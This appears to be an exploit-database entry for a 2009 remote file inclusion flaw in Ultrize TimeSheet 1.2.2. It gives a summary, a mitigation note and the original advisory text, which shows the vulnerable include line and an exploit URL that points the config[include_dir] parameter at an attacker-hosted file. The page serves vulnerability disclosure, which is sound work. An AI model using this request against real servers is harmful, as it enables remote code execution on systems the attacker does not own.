header-logo
Suggest Exploit
vendor:
TimeSheet
by:
NoGe
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: TimeSheet
Affected Version From: 1.2.2
Affected Version To: 1.2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

Ultrize TimeSheet version 1.2.2 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a URL in the 'config[include_dir]' parameter that points to a malicious file on a remote server. The malicious file will then be included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

=====================================================================================


  [o] Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

       Software : Ultrize TimeSheet version 1.2.2
       Vendor   : http://www.ultrize.com/
       Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=====================================================================================


  [o] Vulnerable file


       include($config['include_dir'].'timesheet.class.php');

        include/timesheet.php



  [o] Exploit

       http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]


=====================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
=====================================================================================

# milw0rm.com [2009-07-28]